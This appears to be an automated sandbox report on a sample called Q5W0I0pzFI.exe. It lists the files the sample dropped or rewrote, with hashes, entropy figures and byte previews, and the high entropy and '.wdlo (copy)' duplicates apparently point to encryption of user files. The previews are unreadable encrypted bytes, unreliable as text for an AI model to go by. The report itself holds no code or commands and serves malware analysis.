.Gi9.......5...e..Z.bt#@...........??...e..u1...S...XOw.pW./0./..>7.4....M..`.!.)w.T.......9..JWX.I.\|.../.......j......4..Xz...%.......N.{..~.......7&..p..4\..G..X.0L.S&O..#b...z..'..BP...=...p.I.i.....D...`..7L.k.[J,j..yc...N.... .........x...'.+...c...u#...X..LV.D..G.QF.7.\|&a.................h..7F....Q...{.....p.Yb.!6X.+u.....v.lI(VC.e..\|s..z..q.ml.r...F.'.R.K...U......Hn..Xs....u.#..7.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Music.library-ms

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	2402
Entropy (8bit):	7.918797504808612
Encrypted:	false
SSDEEP:	48:enU6ti0gKfZRinElkBXWYNb9T5GeT91OMkhp8+Yl+P5WN8DT93aWVD:qtTgKxRiUWWY31GeHYn8xl+P5j393z
MD5:	96BB760300C8665BAEA58CDF39B8F9CC
SHA1:	EB452135DB6A77E7352B42E505E573271C1E486C
SHA-256:	C8BA2BC084B69F6950A070D9937488B960ACFBB67A3BB37660E956A2A7DCC260
SHA-512:	E3324546FF0E152D5E75672D48E55301D3970B94392BF1061D00BBD048AB7F3B6C2FB4F0C4C234BCF7BA7027C8649933074A648B500A5F4B66F61F1A5A9C82A2
Malicious:	false
Reputation:	unknown
Preview:	<?xml.-.>....h.......U.<[..h...om7..q....J.........e..Y.>PJ"....5.IC7.....[.U....&!.....J97.....?(.[.jD..._.,).PZ..&.......t..Vi..... .`....4,..........R.>r.{.....Q.<,...<.Xb....."P...Q.............X.]....V...k.......\...nyO....#.w.\|.x....b z..`.2.k.c.k?%Jl......x.b...d..LL....x.f..(p.MT.o..S.(.~.;K.....B.!.s'.dz.H.dl.SMuH@.0S.y.Y.=..-y..P.%..Y.......f..Fcr.4..(..le.a...s>O...K6.$.....8.....!....,a?...E...9..D..".%.+..[..'.'.'7......2P.V..f.-......'.^&f..../=...W.)...k...;GL.m...h\|,...m.9.3.B.}..\|.\|#....7.j....ep3. s..z.O....Vi.....U..6n#...`8T.l....w..Co@.q.Uv.;.[..P..(..C.....=h.....-1..@.W.x.4........_MS'......k..Y......0E.~.E..^.I.@]...9...t@.>x.3..3.Ty`.]..W....<.7......4 .O.VXV.E.Y......=7.1..];.2\....^.J>.`6.....{..hnRt..f5..)....B.:.>U._.{.VNqwV....@.................t:.e.>s.tm......M..g.~n..`.....nk...}w)........[...".\|...<._u/j..nq.j....4l.i.OQ..-.H..n}.\|.u.`a.G.MC..V.".6.y..aK.w.~.Eu.O.M....[..q..y.I......\.HY.1..w.1H..u...py

C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Pictures.library-ms

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	2420
Entropy (8bit):	7.924392272644466
Encrypted:	false
SSDEEP:	48:GJSwY9SAltYypLHk1hb3gAKEDfgqqLBSL67nJE0MGTMzyS2ApUWVD:+SwY9Skf+T97ggLmnAzySvJ
MD5:	A4C12B24B1FA79F54DF37EBA397C1E22
SHA1:	2003FF366604ADCE6B6ACA91EAD9C0BF999AC95A
SHA-256:	3081079E8202DB5953135CA07A8928F9685CD1373BCCC35BC4F32BE40C624E81
SHA-512:	C5FFEA4C79806F9354C3A5E9A7844092FBC5BFDF284B62FB867381F6F20B61D34A1402125E738CEAE26125392EA5E86D1F7E045E3A10A295D7A4B8AABCBCE3E8
Malicious:	false
Reputation:	unknown
Preview:	<?xmlDW..F^."G..4T.8...5.J....LH......o..W........).S....c.e$...s..&NhQR..Ei..K.F.g.4..'.VeA.@ >.L..i.Di.v...@.U.t...I.@.;....=.mT...].7Sj"G..3..q....IE<...f......1J....$g^...B.`.$..T..D7..@1...q..Q...eAxP......)...db..{Z.-[...W....2.6.:.......kw........:.]...._/..".......x...1....S....G.r..A..[.U.b._.`..K.....f;`..wl....n\.J.&.D...\|..kT....c..Pc.............\|..=...y....6.iAWq..N...vK....Y..A..oz.&.P...n!...A.{..V.......lBq@........%.S.q..J.F..nW..t^...F...a...[.2.pvk.E.....P.W.{...A.FX..\........'..Ew=.-bVO.USj....<...r.....=T.vQ.%..E...hWR..[.\?_...o..$.C`@(._....?....WG......k.d.}.:w3....}#.d.qI_.U....U....),.w.}^....UM\.G...oIN..s.A<..=x.....$.2.t9.........`...@. \|o.".\d....<./...0...%.H.._.~.U...........Hw.L.V..(G..=#.<...'2A.......-W.~....'..."q?..0.<.z/..^.n..UMd....Z.ae=..W.f...-.l...,.ui..]{.K]...6...9...G....(....+(...M.q.Q9.[.*P.X..#W.>h..+".Wr.8]\....Soo.....E...d......RZ. ....9.?4..gV.....2pL.......>......,..,......-....W.y?..4.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Videos.library-ms

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	2430
Entropy (8bit):	7.915150794793985
Encrypted:	false
SSDEEP:	48:EvPG8kt+OI/3ISa5E3c+BoBVw0tLcH2kglE2NABqtihCWVD:EvPpktHOIS11oB6AC2kglN6Bqtihb
MD5:	64C2A4B8A95B3160025EE9E35E60B5DA
SHA1:	AEE96E1C91F5EF26996630589E97585714AF864D
SHA-256:	14046E00F5920B5E05F73D013038B0B1276BFC2B79D5EB601C312F4556A8EC74
SHA-512:	ED21D3CC5906A47DC2A3C512ABBD2DA09AC5862E8E365BE1F2EF9BDE3DA9F6226063692C85045677283B7D4EA35EF103766486BE83056CB40BE98CBEC8EAFA86
Malicious:	false
Reputation:	unknown
Preview:	<?xml.:....N&h...z.2.......S.Y..:...lF.J)..<...j......E.}n.....Ux...)....g..9....P....P.G^.....m.A.q....k.0..n.3....D...'W$..(S......i...E..2.....M..qz.e..v.../......S..cn.@.K`g.......".\B...n.=.M....q..O...a.5....mFp..._w~h.j.,z....W..R....M...E.>....,/...w4....:K......./}...4jCR..-...).....w3..>..Kj.\=......m.<..r.!p.@..q.(<.F...Q.......%.?+.....o.P.km_+.:..E.C..L..3m'G.so.H..@.6. .F+.Q.wVx.?mG.8....=..L..).....Uz1.fmCW...F_..;....._....!....u.T...g1.!.~...{......5.^.{.\-.)..&....e!#.^.rk..=.=f..^.w..g..=..'p@.0...g.Gn^...=~hf.m...c)2...c5.....8....qf9...^l....}...'.K...".~......e.-kzR.....#.....:.....K.r.l.p....)YhF..s...3z.....;...JZg.8..M.........(.2*..hg.1.P...@...6...N.T,.Rr..O..~5..O..a,}8yVB5d.bw..^a&..`.`e..-.:h..S.....5.}..:......W.&IuD...Sh.=....h.....n.G`5A.i....}/.\|...X6..@....;......?b.@.g..V....@.....\|.a/a....c.r3VaQ5...9{v...b.(`#.g.].[...W'..s."h..l....r.h..3......K(B...P.m."..G......6.qH....o......[..z!..RWA...!....._

C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\Bluetooth File Transfer.LNK

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1383
Entropy (8bit):	7.876179196228293
Encrypted:	false
SSDEEP:	24:kE6nZucUpYl/Yth3MVRui5M2Lfua+Am1YjLa490feLnbPky2YrWFbD:kHIcUYKj3M95pu1W249ceLnbPkyWVD
MD5:	907FD3530A72B4E777168CC56B59EAB3
SHA1:	0559A0FD7D7DD1EF7998E9A5AC906912C7E0809A
SHA-256:	2DE9F3D8D39FE1CA7CE77796F649B34364459228770DECC850ED66492D56B3EC
SHA-512:	BB30C539B00B3C91681D99ACD5009E7570B21379EEE6540E8F921F3CF95A20E727FBEE2229EC2C6FAED9F53846DF6B6BC82B2576561D4233E51C28BDFDD853E3
Malicious:	false
Reputation:	unknown
Preview:	L.....{.....f...0.pI?.x?`..X.....0...i........l=z.b..^..#.-..{....y.F..<i.(....6\|.?....h..6n.\..m.........JE..z.v...!#........p.t..\b=.?r.9./(..y0.....s...X..g..W'.(u...C.t.(F......?4b....-.3!.I.(T....Nb]..WR+........u)....U@.$...}.5..w%<wR.o...R..Ej.1..9.Q..W.t/.>.?.(.....@d..jq.......<......n.#z79.f.....E.\|.0....6.........1?..Pr.....o{]..Gn...>aZo..H.<.]....(.........}=P......KZ."...L\|.......J...m..8....5..nOU.2u.oYk.'T...../.Z9.Z.....N2.y..S....A...[!.[...&....2.4.q.A1..{.X./gDN!.'....qY..o.C..{..D6:?..[.9C.r.\~.c..W..c..%.....H.....0..fx.5....j9RF-........n.........k.B....b.%...:.........z.Y.;0.v.7[../.j........Q.F..o.].$l...@.......e$...q.Xg._.d!..G'..7.}..m?...8..Sc...7.(......... 0.......V.9.y...,R..Y...>.#7.R..l.a.p.(?9.]..ttY4..9...n.{...bT6.....N......).T~.t.'....}(C.w^.Gr\|.";Z..i.cl....9...6..5.E..h .9.m...Ee..0..e?.<.&.J.....L..@.(...E.....d..;y4.....~.8.\|.\$(_1r..X.^....8"...^i.t.......z.hA......VW..{K.R=\

C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\Desktop (create shortcut).DeskLink

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	341
Entropy (8bit):	7.2794270405607735
Encrypted:	false
SSDEEP:	6:7+4YL5gAYevgsdel58q0XbWW/5q4tGuCXdZZdWgbc+K6Dj6Z3cii96Z:7+VL+3igb82ERCtdWpMDj6Z3cii9a
MD5:	1DCE9464548743991A2E48CA92649802
SHA1:	CEE0950701D2EA833507AC00CA89150230DF8D24
SHA-256:	7AA3E7ECF7B76B13DD23AB8198CC993CEB2915E9DD4238F70859393CC0E57A71
SHA-512:	BE0FD9123E6E6BC44E5B006138B24DDDBFE01CE995C3E628CFE3441E01C24B9154F528BCE75AA5222F9B2FC897A5C975192A7EAD069153D630EFBBC98CD01AE3
Malicious:	false
Reputation:	unknown
Preview:	deskt..>}.t..`...g._.....1.=..j..Ev=..!..p.f.........(....L...Rz.....o.w..c....:h.g......B......ly.=_+\.6!..L...%....q....Y6..a.FH.!i ..EZ.l...S.Dy..*.Gf@O..Z..Ld\|.b..k..M..j.^....=t.U5..,..y..9;.R\|6..G/.6.\.....O.vw..t..!.........0.8.<x:...f...Me...xbI3korummUBs8FkOfnlkmyPBpGXVVLKRBquJ2Nh{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Application Data\Microsoft\Windows\Libraries\CameraRoll.library-ms.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1352
Entropy (8bit):	7.868503526021263
Encrypted:	false
SSDEEP:	24:J0zJDtbCLXJWhWvggUZoT3HMpbCm1pNkrmT3Jd/GGT+f/0WFbD:J0zfu5IgEoTIbt1wu7/H1WVD
MD5:	D0629181A1CFDABB30B24A118C82C785
SHA1:	C3DF5FB4158FC5BEC1BF332F6D74A0DE5B7F27AA
SHA-256:	DAA93B1EB1C362C92194D2DDF93F73C34259238024FD8FC11F60AF8E86AF69DC
SHA-512:	0F0E9BF78DA109BE50C9747179EB8C4907C75CA3B8EBB2676BDA355F408DC6B0517AA681F392193EE15BA961C13FAE9432F06C7504E18390442DD66068359E4B
Malicious:	false
Reputation:	unknown
Preview:	<?xml..+ Q\?.=.k.m.Lx@..a.P`..B.....u.#...'.....t.%.~...../.`.P{_....p#pG..1@.^\| ....P.W.c.....0.(...;.....'..Al7...g...D(....!@.t..5.\.._......^7.J...r3-?6..Z xB.s.G.$..,..H.b......F...fXQ3....A..\|..@\|.e}a.}Pg...U..T.:Z<.......8.Am ..!...L...c...?FM.\|.e....\s..._.....dhQ]=..'.Z..U.&...].....~h.Qpt....v..+n{b...... ...-.D...();.8s........d.....&b!...$..fc/M.....a.t.L...7.....2Q...)....J .A.T..........~x.x~sw3r.......k..%......_.%..\J.D".(0..j.H..f..>. I..S...?3R...[@.;...S..!I....Ij....<K.P.E].+......_U...p...2.y5l....]....\|O...A..m7....\|Aq..Z.N....r.........[.....U.........3.)r.x..j.ge.,..8...k. Q...N.".e..Z.E..^......s.8B.._aW.MX.Sh4.4..8,..&...]..j.}.;..9S..i%.:1i.$..h.:.^.%\|..e.*...E.v.S@z..k..e.-.J....'.ai.(...c.^........`..~.>.t..q.F.."..+}......4.LG.^-.q.....C...h.S}Zn..h.z.....H.U#.w.I..t<.d....) @b...A$E.}2.$}..C.P.,}hI.......Gz.7.6..L...95.1.X.d.0h.."@X...k.R8]..!=e..s#...XR..\|....5...z`.%./..........s./....C....R.@..J.[.6....

C:\Users\user\Application Data\Microsoft\Windows\Libraries\Documents.library-ms.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	2445
Entropy (8bit):	7.926456744628742
Encrypted:	false
SSDEEP:	48:6Uok1yQmExIGobTKOPEnQqQxZnAmmFa230/LARtF0KyWVD:6UAQPIGobj84zAa2YmWKL
MD5:	E55AA2964A1F85D142F4F6ABF1FB3D98
SHA1:	15C1A045C04DFEC70B4133AEAE462BACEAAA9AD5
SHA-256:	0B756F9DC86CE791BA3575741FDE377D8C8E28A2ABB30D4898384B9575711B88
SHA-512:	38D40DF465DA506C216A838A074449F45A063150CEDAF5B0E3D87C06AFA8D6896477137789B6B12B2353FED400F47C5B4D2D1D57B687F2B96F3E5CE9C752736D
Malicious:	false
Reputation:	unknown
Preview:	<?xml...,.....l..Zt...T2c.z>....D..8.K,j...jYB.-...y2..\~.I......b.....b.....i..V.b....y$._.@r.!A.T..Q..-.V.0.R?....?[).`..~.1...G..$_..P...T...K8Gc....=/.....\|.zEW...B..j".[.b..z...c.v..1.U..G^...-.I. .=...nZ...Q"~.jl...C...&..^[U0.$.mp.[Kl..s.$...n_..Nk.cu'j..Q.o7.c.....B1<k.g.1..D6b<:c?1.hIQ...?.../...FS~u...!'..p7..X.s#.U.I..4...3E.]R^.:......x....,w..h.<Z..\..m..X.i........\Wq.!5r.v..........l.%.\....]....z.r.f?=..2j.....R..g)#.;.3..:m...^..../s...5.\....x......6....7$KViq.....k ......7....X..!?.j.W..\|%s..G..F..9..$..>C.T.l..Q....n.Vic..C..."Z..[.. .Gi9.......5...e..Z.bt#@...........??...e..u1...S...XOw.pW./0./..>7.4....M..`.!.)w.T.......9..JWX.I.\|.../.......j......4..Xz...%.......N.{..~.......7&..p..4\..G..X.0L.S&O..#b...z..'..BP...=...p.I.i.....D...`..7L.k.[J,j..yc...N.... .........x...'.+...c...u#...X..LV.D..G.QF.7.\|&a.................h..7F....Q...{.....p.Yb.!6X.+u.....v.lI(VC.e..\|s..z..q.ml.r...F.'.R.K...U......Hn..Xs....u.#..7.

C:\Users\user\Application Data\Microsoft\Windows\Libraries\Music.library-ms.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	2402
Entropy (8bit):	7.918797504808612
Encrypted:	false
SSDEEP:	48:enU6ti0gKfZRinElkBXWYNb9T5GeT91OMkhp8+Yl+P5WN8DT93aWVD:qtTgKxRiUWWY31GeHYn8xl+P5j393z
MD5:	96BB760300C8665BAEA58CDF39B8F9CC
SHA1:	EB452135DB6A77E7352B42E505E573271C1E486C
SHA-256:	C8BA2BC084B69F6950A070D9937488B960ACFBB67A3BB37660E956A2A7DCC260
SHA-512:	E3324546FF0E152D5E75672D48E55301D3970B94392BF1061D00BBD048AB7F3B6C2FB4F0C4C234BCF7BA7027C8649933074A648B500A5F4B66F61F1A5A9C82A2
Malicious:	false
Reputation:	unknown
Preview:	<?xml.-.>....h.......U.<[..h...om7..q....J.........e..Y.>PJ"....5.IC7.....[.U....&!.....J97.....?(.[.jD..._.,).PZ..&.......t..Vi..... .`....4,..........R.>r.{.....Q.<,...<.Xb....."P...Q.............X.]....V...k.......\...nyO....#.w.\|.x....b z..`.2.k.c.k?%Jl......x.b...d..LL....x.f..(p.MT.o..S.(.~.;K.....B.!.s'.dz.H.dl.SMuH@.0S.y.Y.=..-y..P.%..Y.......f..Fcr.4..(..le.a...s>O...K6.$.....8.....!....,a?...E...9..D..".%.+..[..'.'.'7......2P.V..f.-......'.^&f..../=...W.)...k...;GL.m...h\|,...m.9.3.B.}..\|.\|#....7.j....ep3. s..z.O....Vi.....U..6n#...`8T.l....w..Co@.q.Uv.;.[..P..(..C.....=h.....-1..@.W.x.4........_MS'......k..Y......0E.~.E..^.I.@]...9...t@.>x.3..3.Ty`.]..W....<.7......4 .O.VXV.E.Y......=7.1..];.2\....^.J>.`6.....{..hnRt..f5..)....B.:.>U._.{.VNqwV....@.................t:.e.>s.tm......M..g.~n..`.....nk...}w)........[...".\|...<._u/j..nq.j....4l.i.OQ..-.H..n}.\|.u.`a.G.MC..V.".6.y..aK.w.~.Eu.O.M....[..q..y.I......\.HY.1..w.1H..u...py

C:\Users\user\Application Data\Microsoft\Windows\Libraries\Pictures.library-ms.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	2420
Entropy (8bit):	7.924392272644466
Encrypted:	false
SSDEEP:	48:GJSwY9SAltYypLHk1hb3gAKEDfgqqLBSL67nJE0MGTMzyS2ApUWVD:+SwY9Skf+T97ggLmnAzySvJ
MD5:	A4C12B24B1FA79F54DF37EBA397C1E22
SHA1:	2003FF366604ADCE6B6ACA91EAD9C0BF999AC95A
SHA-256:	3081079E8202DB5953135CA07A8928F9685CD1373BCCC35BC4F32BE40C624E81
SHA-512:	C5FFEA4C79806F9354C3A5E9A7844092FBC5BFDF284B62FB867381F6F20B61D34A1402125E738CEAE26125392EA5E86D1F7E045E3A10A295D7A4B8AABCBCE3E8
Malicious:	false
Reputation:	unknown
Preview:	<?xmlDW..F^."G..4T.8...5.J....LH......o..W........).S....c.e$...s..&NhQR..Ei..K.F.g.4..'.VeA.@ >.L..i.Di.v...@.U.t...I.@.;....=.mT...].7Sj"G..3..q....IE<...f......1J....$g^...B.`.$..T..D7..@1...q..Q...eAxP......)...db..{Z.-[...W....2.6.:.......kw........:.]...._/..".......x...1....S....G.r..A..[.U.b._.`..K.....f;`..wl....n\.J.&.D...\|..kT....c..Pc.............\|..=...y....6.iAWq..N...vK....Y..A..oz.&.P...n!...A.{..V.......lBq@........%.S.q..J.F..nW..t^...F...a...[.2.pvk.E.....P.W.{...A.FX..\........'..Ew=.-bVO.USj....<...r.....=T.vQ.%..E...hWR..[.\?_...o..$.C`@(._....?....WG......k.d.}.:w3....}#.d.qI_.U....U....),.w.}^....UM\.G...oIN..s.A<..=x.....$.2.t9.........`...@. \|o.".\d....<./...0...%.H.._.~.U...........Hw.L.V..(G..=#.<...'2A.......-W.~....'..."q?..0.<.z/..^.n..UMd....Z.ae=..W.f...-.l...,.ui..]{.K]...6...9...G....(....+(...M.q.Q9.[.*P.X..#W.>h..+".Wr.8]\....Soo.....E...d......RZ. ....9.?4..gV.....2pL.......>......,..,......-....W.y?..4.

C:\Users\user\Application Data\Microsoft\Windows\Libraries\Videos.library-ms.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	2430
Entropy (8bit):	7.915150794793985
Encrypted:	false
SSDEEP:	48:EvPG8kt+OI/3ISa5E3c+BoBVw0tLcH2kglE2NABqtihCWVD:EvPpktHOIS11oB6AC2kglN6Bqtihb
MD5:	64C2A4B8A95B3160025EE9E35E60B5DA
SHA1:	AEE96E1C91F5EF26996630589E97585714AF864D
SHA-256:	14046E00F5920B5E05F73D013038B0B1276BFC2B79D5EB601C312F4556A8EC74
SHA-512:	ED21D3CC5906A47DC2A3C512ABBD2DA09AC5862E8E365BE1F2EF9BDE3DA9F6226063692C85045677283B7D4EA35EF103766486BE83056CB40BE98CBEC8EAFA86
Malicious:	false
Reputation:	unknown
Preview:	<?xml.:....N&h...z.2.......S.Y..:...lF.J)..<...j......E.}n.....Ux...)....g..9....P....P.G^.....m.A.q....k.0..n.3....D...'W$..(S......i...E..2.....M..qz.e..v.../......S..cn.@.K`g.......".\B...n.=.M....q..O...a.5....mFp..._w~h.j.,z....W..R....M...E.>....,/...w4....:K......./}...4jCR..-...).....w3..>..Kj.\=......m.<..r.!p.@..q.(<.F...Q.......%.?+.....o.P.km_+.:..E.C..L..3m'G.so.H..@.6. .F+.Q.wVx.?mG.8....=..L..).....Uz1.fmCW...F_..;....._....!....u.T...g1.!.~...{......5.^.{.\-.)..&....e!#.^.rk..=.=f..^.w..g..=..'p@.0...g.Gn^...=~hf.m...c)2...c5.....8....qf9...^l....}...'.K...".~......e.-kzR.....#.....:.....K.r.l.p....)YhF..s...3z.....;...JZg.8..M.........(.2*..hg.1.P...@...6...N.T,.Rr..O..~5..O..a,}8yVB5d.bw..^a&..`.`e..-.:h..S.....5.}..:......W.&IuD...Sh.=....h.....n.G`5A.i....}/.\|...X6..@....;......?b.@.g..V....@.....\|.a/a....c.r3VaQ5...9{v...b.(`#.g.].[...W'..s."h..l....r.h..3......K(B...P.m."..G......6.qH....o......[..z!..RWA...!....._

C:\Users\user\Cookies\deprecated.cookie.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	425
Entropy (8bit):	7.441476826305252
Encrypted:	false
SSDEEP:	12:AZjVDmSFqI4e1Jp4FtZ90N9jB//Wj2anxdsDj6Z3cii9a:AdVDmSFqFSJuB9pjvxkWFbD
MD5:	9CD72B0E2CC8A286E09F1C4EA07E1D7F
SHA1:	0D2716C668C9615A8C9332E24B57284EF826A593
SHA-256:	C7486E7429A35AF496CF3AF6857524C7574FE4B79E71CFFFF8E86FFFF43B1A70
SHA-512:	3AC39C1231CBE0D3BEFCED07D1120CB2BFF2A5C1E317753F1001A3284AEA9FAE5302D4AA6441818CA966E987537759E651691B12268B448CC249D37CA8F29FBC
Malicious:	false
Reputation:	unknown
Preview:	Cooki...]9b..}..v..,...../..y.2.J..!.).)......<..P..z...T..Z........+....WD....8.S..Fi.d.......B`.-.HC.m\|.(.pEq6...+`...0..u..P...o.....].....\x..<Ln..bC..IDEzRv...J?>.....w.s....?).#.[..`...'...Z....>....I.>......I..P@v.....@.Nx..m.m.}%i..L....H..32...&H^..'...w...8.]....oR#.cS....^.,.o4........a:4.}?.^R.-.4.5....A:....xbI3korummUBs8FkOfnlkmyPBpGXVVLKRBquJ2Nh{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Desktop\BPMLNOBVSB.docx

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.837166365039256
Encrypted:	false
SSDEEP:	24:W9aVmKt0P/rMxysh6+59UL4Z07kqNIOWVAl8NGxJu86HcfwY9q0MUl4oceZnohWt:NX0PIbh6Ae4+kzV9NgJAYg01+oVnohWt
MD5:	CB5702A94CFCB5C0CF0993A6B38E77D4
SHA1:	7C82F72ED6743CC22E3813C47EAB07866F4F81A6
SHA-256:	E9C70C6FB9844039C9A26DB90D1F42E70BF67FD5A011E5CC04678B78284B9A2A
SHA-512:	D699490B03EDF6190276A56B5BA98BBA32529265F3B589E1BB1989C7559CCB40E32264578FF0296070F9767EC65FB9EB670BBBFF43BB07954035A7ADA1874D8A
Malicious:	false
Reputation:	unknown
Preview:	BPMLN....T@s.....Z'.65.....p.Qt...Z.E..)9...!P.}s..A...:......0....o8..?...(...h.D..e.2....7...U.Y..j..M..X,..m;]R%>\|/......5.4K!..=.%c..4.....{22._5Q.kM...vs...!. ....x..K.W.#..?<..k.p.;Y. >E...ac.HE-....nU...5...;O....E..$...Khm..3...R'US.G..i.R...{.,4.XO."..Er.;..O.5..5...X.U...}\....17..F;..^...,..`........C./.....O....E.D......z...v...zD.uO.c7..r...3.O.f.,......v....?..6z..?..g.6..._%\......m.,..r]....$.DwQ...X...c.l^.@.~FG...4Nw.i...Vfr.X.$5y..P...P!......U_%B$x....4mD_....{?.\|.\|g.......l.yP...G u..@-.I4K .g R.....!.)o...4....0.Y...[k....jvv.............)..~..Y,.....w......_.{......{....2.@......].\...^..x...6.e.Km..Y.k@...Y1.Qv...x..=.d....&...?.&"B..t. dw..B...-loW=m;NS.....E..........$.M2...a.yX.s....`....N...0.}.i......"}.I.....i.F.T.h..q.c.!&.u......>.^.3.W..;R..v...6.7_.....4...wQ.yB.l.b..v.f....AU.q.6%'..%.4_..T.....Y.;].......3X...Q..A$@._..m93..I..H{O..W.2......(.8.Qs...e...`I.....H/..}..E.{.&..>$F...

C:\Users\user\Desktop\BPMLNOBVSB.docx.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.837166365039256
Encrypted:	false
SSDEEP:	24:W9aVmKt0P/rMxysh6+59UL4Z07kqNIOWVAl8NGxJu86HcfwY9q0MUl4oceZnohWt:NX0PIbh6Ae4+kzV9NgJAYg01+oVnohWt
MD5:	CB5702A94CFCB5C0CF0993A6B38E77D4
SHA1:	7C82F72ED6743CC22E3813C47EAB07866F4F81A6
SHA-256:	E9C70C6FB9844039C9A26DB90D1F42E70BF67FD5A011E5CC04678B78284B9A2A
SHA-512:	D699490B03EDF6190276A56B5BA98BBA32529265F3B589E1BB1989C7559CCB40E32264578FF0296070F9767EC65FB9EB670BBBFF43BB07954035A7ADA1874D8A
Malicious:	false
Reputation:	unknown
Preview:	BPMLN....T@s.....Z'.65.....p.Qt...Z.E..)9...!P.}s..A...:......0....o8..?...(...h.D..e.2....7...U.Y..j..M..X,..m;]R%>\|/......5.4K!..=.%c..4.....{22._5Q.kM...vs...!. ....x..K.W.#..?<..k.p.;Y. >E...ac.HE-....nU...5...;O....E..$...Khm..3...R'US.G..i.R...{.,4.XO."..Er.;..O.5..5...X.U...}\....17..F;..^...,..`........C./.....O....E.D......z...v...zD.uO.c7..r...3.O.f.,......v....?..6z..?..g.6..._%\......m.,..r]....$.DwQ...X...c.l^.@.~FG...4Nw.i...Vfr.X.$5y..P...P!......U_%B$x....4mD_....{?.\|.\|g.......l.yP...G u..@-.I4K .g R.....!.)o...4....0.Y...[k....jvv.............)..~..Y,.....w......_.{......{....2.@......].\...^..x...6.e.Km..Y.k@...Y1.Qv...x..=.d....&...?.&"B..t. dw..B...-loW=m;NS.....E..........$.M2...a.yX.s....`....N...0.}.i......"}.I.....i.F.T.h..q.c.!&.u......>.^.3.W..;R..v...6.7_.....4...wQ.yB.l.b..v.f....AU.q.6%'..%.4_..T.....Y.;].......3X...Q..A$@._..m93..I..H{O..W.2......(.8.Qs...e...`I.....H/..}..E.{.&..>$F...

C:\Users\user\Desktop\BPMLNOBVSB\BPMLNOBVSB.docx

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.852216226991172
Encrypted:	false
SSDEEP:	24:fmsK+ZKdXH4TcBRDSDvHAGuQDgPJaHyL6JRL7/8+ziBn6M10WFbD:fvKfH7bDeHAGuQDqMPRL7/8IiH0WVD
MD5:	C8CBFA969D043AC5A07D29737744ACA2
SHA1:	2934626D46460DFCCDEA70CA57DB7E43ECB9CC4A
SHA-256:	6CEF50F0A62B292AB2411CA72122AFC4FE6BA1C6AD3F20B1B50B99007F49686E
SHA-512:	4CDD32EBC9FCF44CBD3E9EBCF48656AB376151D8649858FDE002C02D47C579A17E658BE22287AAEBDA6345F2372C2DE39CA62A63C409C388C7BDABB08D5E7E7F
Malicious:	false
Reputation:	unknown
Preview:	BPMLN....`.C.n..~.....W.FK..q...........9.9........m.c..'.U.'e.J.{...S..s...i.M..Gx.._.+%9.Jp....u.D3..2.dz..)?"O....s..tb.ur=q.S.%.9.YT.N..R.r.?..X'..I..y............[.j.z...P.....6Zv..2k.L..o.`.z.8a.]....Q...6.x.i.Prt.;7.=.j....#rv.]..{.!.!...4.f.p..C.!e.....$[....Yt..E...xe.V<.I"...f..........?.8....M&.Bjq1...h7..X.u.&Y.h.Mi..&k....\|.......<v8..B8..G.e..mn..HE.........f...g....n..L@.QL...d..M.....x.)g./2.[..c.1'Y.2........xI....k......o..s...k.H..L..x..@N6.a.,....Q..W..*....w...'.'..QDm...E.<....k...,\Nhn.4X.....4o.......vM.........?).....7....N-..+...#.....Q...O...n?.Q...X....`.....8wwzp..b..w^...T..>. .3..WbRp<.na.zL5.u.W...\|...8.3m<..o.bt. !A.{...D..+....^...D0^...Q..m6\|^~28p}.`...6)..a.&./.=6......0...$....1.....H..:A..J..j..uTi..V..y=......v.%1N.q...$\|.."..2e.......d..KB...+.f.`]NR....Zw....\|...3.J.i?;.V.....Du....+4.[N....!&(G.....sS>"..rvr.j.......Qf.d...6....A...AuB<.b.Uj .5.51-..F....S...\|.;R.....[..1y..B..0\.c.K.~..F.DzU'v....

C:\Users\user\Desktop\BPMLNOBVSB\BPMLNOBVSB.docx.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.852216226991172
Encrypted:	false
SSDEEP:	24:fmsK+ZKdXH4TcBRDSDvHAGuQDgPJaHyL6JRL7/8+ziBn6M10WFbD:fvKfH7bDeHAGuQDqMPRL7/8IiH0WVD
MD5:	C8CBFA969D043AC5A07D29737744ACA2
SHA1:	2934626D46460DFCCDEA70CA57DB7E43ECB9CC4A
SHA-256:	6CEF50F0A62B292AB2411CA72122AFC4FE6BA1C6AD3F20B1B50B99007F49686E
